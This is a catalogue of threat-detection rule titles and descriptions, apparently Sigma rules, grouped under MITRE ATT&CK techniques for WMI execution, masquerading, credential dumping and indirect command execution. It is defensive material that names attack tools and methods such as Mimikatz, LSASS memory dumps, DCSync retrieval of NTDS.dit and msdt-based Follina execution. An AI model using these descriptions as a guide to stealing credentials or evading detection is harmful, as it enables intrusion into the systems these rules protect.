  • Suspicious Browser Activity - Level: high
    Description: Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser
  • Azure AD Threat Intelligence - Level: high
    Description: Indicates user activity that is unusual for the user or consistent with known attack patterns.
  • New Country - Level: high
    Description: Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
  • Unfamiliar Sign-In Properties - Level: high
    Description: Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
  • Stale Accounts In A Privileged Role - Level: high
    Description: Identifies when an account hasn't signed in during the past n number of days.
  • Invalid PIM License - Level: high
    Description: Identifies when an organization doesn't have the proper license for PIM and is out of compliance.
  • Roles Assigned Outside PIM - Level: high
    Description: Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.
  • Roles Activation Doesn't Require MFA - Level: high
    Description: Identifies when a privileged role can be activated without performing MFA.
  • Roles Activated Too Frequently - Level: high
    Description: Identifies when the same privilege role has multiple activations by the same user.
  • Roles Are Not Being Used - Level: high
    Description: Identifies when a user has been assigned a privileged role and is not using that role.
  • Too Many Global Admins - Level: high
    Description: Identifies an event where there are too many accounts assigned the Global Administrator role.
  • Increased Failed Authentications Of Any Type - Level: medium
    Description: Detects when sign-ins increased by 10% or greater.
  • Measurable Increase Of Successful Authentications - Level: low
    Description: Detects when successful sign-ins increased by 10% or greater.
  • Authentications To Important Apps Using Single Factor Authentication - Level: medium
    Description: Detects when authentications to important application(s) only required single-factor authentication
  • Suspicious SignIns From A Non Registered Device - Level: high
    Description: Detects risky authentication from a non AD registered device without MFA being required.
  • Application Using Device Code Authentication Flow - Level: medium
    Description: Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.
  • Applications That Are Using ROPC Authentication Flow - Level: medium
    Description: Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
  • Azure Unusual Authentication Interruption - Level: medium
    Description: Detects when there is an interruption in the authentication process.
  • Google Cloud Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
  • Azure Login Bypassing Conditional Access Policies - Level: high
    Description: Detects a successful login to the Microsoft Intune Company Portal, which could allow bypassing Conditional Access Policies and Intune device trust using a tool like TokenSmith.
  • Microsoft 365 - Impossible Travel Activity - Level: medium
    Description: Detects when Microsoft Cloud App Security reports a risky sign-in attempt due to a login associated with impossible travel.
  • Logon from a Risky IP Address - Level: medium
    Description: Detects when Microsoft Cloud App Security reports that a user signed into your sanctioned apps from a risky IP address.
  • Root Account Enable Via Dsenableroot - Level: medium
    Description: Detects attempts to enable the root account via "dsenableroot"
  • Guest Account Enabled Via Sysadminctl - Level: low
    Description: Detects attempts to enable the guest account using the sysadminctl utility
  • Cisco BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing
  • Cisco LDP Authentication Failures - Level: low
    Description: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
  • Huawei BGP Authentication Failures - Level: low
    Description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing.
  • Juniper BGP Missing MD5 - Level: low
    Description: Detects Juniper BGP sessions missing an MD5 digest, which may be indicative of brute force attacks to manipulate routing.
  • Win Susp Computer Name Containing Samtheadmin - Level: critical
    Description: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
  • Account Tampering - Suspicious Failed Logon Reasons - Level: medium
    Description: This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
  • Suspicious Remote Logon with Explicit Credentials - Level: medium
    Description: Detects suspicious processes logging on with explicit credentials
  • User Added to Local Administrator Group - Level: medium
    Description: Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity
  • External Remote RDP Logon from Public IP - Level: medium
    Description: Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.
  • External Remote SMB Logon from Public IP - Level: high
    Description: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.
  • Failed Logon From Public IP - Level: medium
    Description: Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
  • Suspicious Computer Machine Password by PowerShell - Level: medium
    Description: The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer.
  • Password Provided In Command Line Of Net.EXE - Level: medium
    Description: Detects when net.exe is called with a password in the command line
  • Account Created And Deleted By Non Approved Users - Level: medium
    Description: Detects accounts that are created or deleted by non-approved users.
  • Authentication Occuring Outside Normal Business Hours - Level: low
    Description: Detects user sign-ins outside of normal business hours.
  • Privilege Role Elevation Not Occuring on SAW or PAW - Level: high
    Description: Detects failed sign-in from a PAW or SAW device
  • Privilege Role Sign-In Outside Expected Controls - Level: high
    Description: Detects failed sign-ins due to a user not meeting the expected controls for administrators
  • Privilege Role Sign-In Outside Of Normal Hours - Level: high
    Description: Detects account sign-ins outside of normal hours or from uncommon locations. Administrator accounts should be investigated
  • Interactive Logon to Server Systems - Level: medium
    Description: Detects interactive console logons to Server Systems
  • AWS Lambda Function Created or Invoked - Level: low
    Description: Detects when a user creates or invokes a Lambda function.
  • Failed Logins with Different Accounts from Single Source System - Level: medium
    Description: Detects suspicious failed logins with different user accounts from a single source system
  • Failed NTLM Logins with Different Accounts from Single Source System - Level: medium
    Description: Detects suspicious failed logins with different user accounts from a single source system
attack.t1047 54
  • Windows Management Instrumentation DLL Loaded Via Microsoft Word - Level: informational
    Description: Detects DLL's Loaded Via Word Containing VBA Macros Executing WMI Commands
  • New Lolbin Process by Office Applications - Level: high
    Description: This rule will monitor any Office app that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
  • Excel Proxy Executing Regsvr32 With Payload - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes.
  • Excel Proxy Executing Regsvr32 With Payload Alternate - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes.
  • Office Applications Spawning Wmi Cli Alternate - Level: high
    Description: Initial execution of malicious document calls wmic to execute the file with regsvr32
  • Suspicious Cmd Execution via WMI - Level: medium
    Description: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.
  • WMI Execution Via Office Process - Level: medium
    Description: Initial execution of malicious document calls wmic to execute the file with regsvr32
  • WMI Remote Command Execution - Level: medium
    Description: An adversary might use WMI to execute commands on a remote system
  • WMI Reconnaissance List Remote Services - Level: medium
    Description: An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, service information will be displayed on the screen if it exists. A common feedback message is "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
  • Remote DCOM/WMI Lateral Movement - Level: high
    Description: Detects remote RPC calls that perform remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.
  • MITRE BZAR Indicators for Execution - Level: medium
    Description: Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE
  • T1047 Wmiprvse Wbemcomn DLL Hijack - Level: high
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario.
  • Successful Account Login Via WMI - Level: low
    Description: Detects successful logon attempts performed with WMI
  • PSExec and WMI Process Creations Block - Level: high
    Description: Detects blocking of process creations originating from PSExec and WMI commands
  • Wmiexec Default Output File - Level: critical
    Description: Detects the creation of the default output filename used by the wmiexec tool
  • Wmiprvse Wbemcomn DLL Hijack - File - Level: critical
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
  • Wmiprvse Wbemcomn DLL Hijack - Level: high
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
  • WMI Event Consumer Created Named Pipe - Level: medium
    Description: Detects the WMI Event Consumer service scrcons.exe creating a named pipe
  • WMImplant Hack Tool - Level: high
    Description: Detects parameters used by WMImplant
  • WMIC Unquoted Services Path Lookup - PowerShell - Level: medium
    Description: Detects a known WMI recon method to look for unquoted service paths from within PowerShell scripts, often used by pentester and attacker enumeration scripts
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • HackTool - CrackMapExec Execution Patterns - Level: high
    Description: Detects various execution patterns of the CrackMapExec pentesting framework
  • HackTool - Potential Impacket Lateral Movement Activity - Level: high
    Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
  • Suspicious Microsoft Office Child Process - Level: high
    Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
  • Script Event Consumer Spawning Process - Level: high
    Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe).
  • New Process Created Via Wmic.EXE - Level: medium
    Description: Detects new process creation using WMIC via the "process call create" flag
  • Computer System Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
  • Hardware Model Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
  • Windows Hotfix Updates Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
  • Process Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of "wmic" with the "process" flag, which an adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
  • Potential Product Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
  • Potential Product Class Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
  • Service Reconnaissance Via Wmic.EXE - Level: medium
    Description: An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, service information will be displayed on the screen if it exists. A common feedback message is "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
  • Potential Unquoted Service Path Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
  • System Disk And Volume Reconnaissance Via Wmic.EXE - Level: medium
    Description: An adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the `wmic` command-line utility and has been observed being used by threat actors such as Volt Typhoon.
  • WMIC Remote Command Execution - Level: medium
    Description: Detects the execution of WMIC to query information on a remote system
  • Service Started/Stopped Via Wmic.EXE - Level: medium
    Description: Detects usage of wmic to start or stop a service
  • Potential SquiblyTwo Technique Execution - Level: medium
    Description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
  • Suspicious WMIC Execution Via Office Process - Level: high
    Description: Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).
  • Suspicious Process Created Via Wmic.EXE - Level: high
    Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
  • Application Terminated Via Wmic.EXE - Level: medium
    Description: Detects calls to the "terminate" function via wmic in order to kill an application
  • Application Removed Via Wmic.EXE - Level: medium
    Description: Detects the removal or uninstallation of an application via "Wmic.EXE".
  • WmiPrvSE Spawned A Process - Level: medium
    Description: Detects WmiPrvSE spawning a process
  • Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell - Level: medium
    Description: Detects PowerShell as a child of the WmiPrvSE process, which could be a sign of lateral movement via WMI.
  • Suspicious WmiPrvSE Child Process - Level: high
    Description: Detects suspicious and uncommon child processes of WmiPrvSE
  • Blue Mockingbird - Registry - Level: high
    Description: Attempts to detect system changes made by Blue Mockingbird
  • Suspicious Encoded Scripts in a WMI Consumer - Level: high
    Description: Detects suspicious encoded payloads in WMI Event Consumers
  • Blue Mockingbird - Level: high
    Description: Attempts to detect system changes made by Blue Mockingbird
  • Potential Maze Ransomware Activity - Level: critical
    Description: Detects specific process characteristics of Maze ransomware word document droppers
  • UNC2452 PowerShell Pattern - Level: critical
    Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
  • WMI Module Loaded By Uncommon Process - Level: low
    Description: Detects WMI modules being loaded by an uncommon process
  • File Creation by Office Applications - Level: high
    Description: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
attack.t1036 42
  • Process Memory Dumped Via RdrLeakDiag.EXE - Level: high
    Description: Detects uses of the rdrleakdiag.exe LOLBIN utility to dump process memory
  • Potentially Suspicious Execution From Tmp Folder - Level: high
    Description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder
  • Interactive Bash Suspicious Children - Level: medium
    Description: Detects suspicious interactive bash as a parent to rather uncommon child processes
  • New or Renamed User Account with '$' Character - Level: medium
    Description: Detects the creation of a user with the "$" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms.
  • Password Protected ZIP File Opened (Suspicious Filenames) - Level: high
    Description: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
  • Windows Binaries Write Suspicious Extensions - Level: high
    Description: Detects Windows executables that write files with suspicious extensions
  • Potential Homoglyph Attack Using Lookalike Characters in Filename - Level: medium
    Description: Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
  • System Control Panel Item Loaded From Uncommon Location - Level: medium
    Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
  • Suspicious Calculator Usage - Level: high
    Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
  • Suspicious CodePage Switch Via CHCP - Level: medium
    Description: Detects a code page switch in command line or batch scripts to a rare language
  • CreateDump Process Dump - Level: high
    Description: Detects uses of the createdump.exe LOLBIN utility to dump process memory
  • DumpMinitool Execution - Level: medium
    Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"
  • Suspicious DumpMinitool Execution - Level: high
    Description: Detects suspicious ways to use the "DumpMinitool.exe" binary
  • Explorer Process Tree Break - Level: medium
    Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
  • Findstr Launching .lnk File - Level: medium
    Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
  • Forfiles.EXE Child Process Masquerading - Level: high
    Description: Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
  • HackTool - XORDump Execution - Level: high
    Description: Detects suspicious use of XORDump process memory dumping utility
  • Potential Fake Instance Of Hxtsr.EXE Executed - Level: medium
    Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of the Outlook apps and resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
  • CodePage Modification Via MODE.COM To Russian Language - Level: medium
    Description: Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.
  • Suspicious MSDT Parent Process - Level: high
    Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
  • PUA - Potential PE Metadata Tamper Using Rcedit - Level: medium
    Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
  • Renamed CreateDump Utility Execution - Level: high
    Description: Detects uses of a renamed legitimate createdump.exe LOLBIN utility to dump process memory
  • Renamed ZOHO Dctask64 Execution - Level: high
    Description: Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
  • Renamed Plink Execution - Level: high
    Description: Detects the execution of a renamed version of the Plink binary
  • Process Memory Dump Via Comsvcs.DLL - Level: high
    Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
  • Suspicious Process Start Locations - Level: medium
    Description: Detects suspicious process run from unusual locations
  • Sdiagnhost Calling Suspicious Child Process - Level: high
    Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
  • Potential Command Line Path Traversal Evasion Attempt - Level: medium
    Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
  • Process Execution From A Potentially Suspicious Folder - Level: high
    Description: Detects a potentially suspicious execution from an uncommon folder.
  • Potential Homoglyph Attack Using Lookalike Characters - Level: medium
    Description: Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
  • Suspicious Process Parents - Level: high
    Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program
  • System File Execution Location Anomaly - Level: high
    Description: Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
  • Procdump Execution - Level: medium
    Description: Detects usage of the SysInternals Procdump utility
  • Potential SysInternals ProcDump Evasion - Level: high
    Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
  • Potential LSASS Process Dump Via Procdump - Level: high
    Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.
  • Taskmgr as LOCAL_SYSTEM - Level: high
    Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
  • New Process Created Via Taskmgr.EXE - Level: low
    Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
  • Potential ReflectDebugger Content Execution Via WerFault.EXE - Level: medium
    Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
  • Suspicious Child Process Of Wermgr.EXE - Level: high
    Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
  • Suspicious Windows Update Agent Empty Cmdline - Level: high
    Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
  • Suspicious Computer Account Name Change CVE-2021-42287 - Level: high
    Description: Detects the renaming of an existing computer account to an account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
  • CodePage Modification Via MODE.COM - Level: low
    Description: Detects a CodePage modification using the "mode.com" utility. This behavior has been used by threat actors behind Dharma ransomware.
attack.t1003 40
  • Mimikatz MemSSP Default Log File Creation - Level: critical
    Description: Detects Mimikatz MemSSP default log file creation
  • Credential Acquisition via Registry Hive Dumping - Level: high
    Description: Detects Credential Acquisition via Registry Hive Dumping
  • Mimikatz Detection LSASS Access - Level: high
    Description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_INFORMATION "only old versions", 0x0010 PROCESS_VM_READ)
  • Activity Related to NTDS.dit Domain Hash Retrieval - Level: high
    Description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely
  • OpenCanary - MSSQL Login Attempt Via SQLAuth - Level: high
    Description: Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.
  • OpenCanary - MSSQL Login Attempt Via Windows Authentication - Level: high
    Description: Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.
  • OpenCanary - MySQL Login Attempt - Level: high
    Description: Detects instances where a MySQL service on an OpenCanary node has had a login attempt.
  • OpenCanary - REDIS Action Command Attempt - Level: high
    Description: Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.
  • Antivirus Password Dumper Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
  • Rare Subscription-level Operations In Azure - Level: medium
    Description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.
  • Linux Keylogging with Pam.d - Level: high
    Description: Detects an attempt to enable auditing of TTY input
  • WCE wceaux.dll Access - Level: critical
    Description: Detects wceaux.dll access during WCE pass-the-hash remote command execution on the source host
  • Credential Manager Access By Uncommon Applications - Level: medium
    Description: Detects suspicious processes, based on name and location, that access the Windows Credential Manager and vault, which can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::cred" function
  • Access To Crypto Currency Wallets By Uncommon Applications - Level: medium
    Description: Detects file access requests to cryptocurrency wallet files by uncommon processes. Could indicate a potential attempt at cryptocurrency wallet theft.
  • HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump - Level: high
    Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
  • HackTool - Rubeus Execution - ScriptBlock - Level: high
    Description: Detects the execution of the hacktool Rubeus using specific command line flags
  • Live Memory Dump Using Powershell - Level: high
    Description: Detects usage of a PowerShell command to dump the live memory of a Windows machine
  • Potential Invoke-Mimikatz PowerShell Script - Level: high
    Description: Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.
  • Esentutl Gather Credentials - Level: medium
    Description: Conti recommendation to its affiliates to use esentutl to access the dumped NTDS file. Trickbot also uses this utility to get MSEdge info via its module pwgrab.
  • Hacktool Execution - Imphash - Level: critical
    Description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
  • Hacktool Execution - PE Metadata - Level: high
    Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
  • HackTool - Rubeus Execution - Level: critical
    Description: Detects the execution of the hacktool Rubeus via PE information or command line parameters
  • Microsoft IIS Service Account Password Dumped - Level: high
    Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
  • Microsoft IIS Connection Strings Decryption - Level: high
    Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
  • Potential Credential Dumping Via LSASS Process Clone - Level: critical
    Description: Detects a suspicious LSASS process clone that could be a sign of credential dumping activity
  • Potential Credential Dumping Attempt Using New NetworkProvider - CLI - Level: high
    Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
  • Suspicious Reg Add Open Command - Level: medium
    Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
  • Capture Credentials with Rpcping.exe - Level: medium
    Description: Detects using Rpcping.exe to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
  • Interesting Service Enumeration Via Sc.EXE - Level: low
    Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
  • Shadow Copies Creation Using Operating Systems Utilities - Level: medium
    Description: Detects shadow copy creation using operating system utilities, a possible sign of credential access
  • Suspicious SYSTEM User Process Creation - Level: high
    Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
  • Loaded Module Enumeration Via Tasklist.EXE - Level: medium
    Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question, in order to dump the process memory or perform other nefarious actions.
  • Potential Credential Dumping Attempt Using New NetworkProvider - REG - Level: medium
    Description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it
  • Potentially Suspicious ODBC Driver Registered - Level: high
    Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
  • Access To Browser Credential Files By Uncommon Applications - Level: low
    Description: Detects file access requests to browser credential stores by uncommon processes. Could indicate a potential attempt at credential stealing. Requires heavy baselining before usage
  • Access To Chromium Browsers Sensitive Files By Uncommon Applications - Level: low
    Description: Detects file access requests to Chromium-based browser sensitive files by uncommon processes. Could indicate a potential attempt at stealing sensitive information.
  • Mimikatz In-Memory - Level: medium
    Description: Detects certain DLL loads when Mimikatz gets executed
  • Dumping ntds.dit remotely via DCSync - Level: medium
    Description: Detects ntds.dit retrieval using synchronisation with a legitimate domain controller via the Directory Replication Service Remote Protocol
  • Dumping ntds.dit remotely via NetSync - Level: medium
    Description: Detects ntds.dit retrieval (only computer accounts) using synchronisation with a legitimate domain controller via the Netlogon Remote Protocol
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
attack.t1202 40
  • Indirect Command Execution via Forfiles - Level: medium
    Description: Detects execution of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting.
  • Indirect Command Execution - Level: low
    Description: Detects indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).
  • Execute MSDT.EXE Using Diagcab File - Level: high
    Description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190
  • Winword.exe Loads Suspicious DLL - Level: medium
    Description: Detects Winword.exe loading a custom DLL using the /l flag
  • Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE - Level: high
    Description: Detects both the CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting the msdt.exe binary to load the "sdiageng.dll" library
  • Troubleshooting Pack Cmdlet Execution - Level: medium
    Description: Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS)
  • Indirect Inline Command Execution Via Bash.EXE - Level: medium
    Description: Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
  • Indirect Command Execution From Script File Via Bash.EXE - Level: medium
    Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
  • Suspicious Child Process Of BgInfo.EXE - Level: high
    Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • Uncommon Child Process Of BgInfo.EXE - Level: medium
    Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • Potential Arbitrary File Download Via Cmdl32.EXE - Level: medium
    Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
  • Suspicious High IntegrityLevel Conhost Legacy Option - Level: informational
    Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
  • Uncommon Child Process Of Conhost.EXE - Level: medium
    Description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.
  • Findstr Launching .lnk File - Level: medium
    Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
  • Potential Arbitrary Command Execution Via FTP.EXE - Level: medium
    Description: Detects execution of "ftp.exe" with a script passed via the "-s" or "/s" flag, and any child processes run by "ftp.exe".
  • Suspicious ZipExec Execution - Level: medium
    Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
  • Suspicious Runscripthelper.exe - Level: medium
    Description: Detects execution of powershell scripts via Runscripthelper.exe
  • Potential Arbitrary Command Execution Using Msdt.EXE - Level: high
    Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
  • Suspicious Cabinet File Execution Via Msdt.EXE - Level: medium
    Description: Detects execution of msdt.exe using the "cab" flag, which could indicate suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
  • Potential Arbitrary File Download Using Office Application - Level: high
    Description: Detects potential arbitrary file download using a Microsoft Office application
  • Potentially Suspicious Office Document Executed From Trusted Location - Level: high
    Description: Detects the execution of an Office application that points to a document located in a trusted location. Attackers often use this to avoid macro security and execute their malicious code.
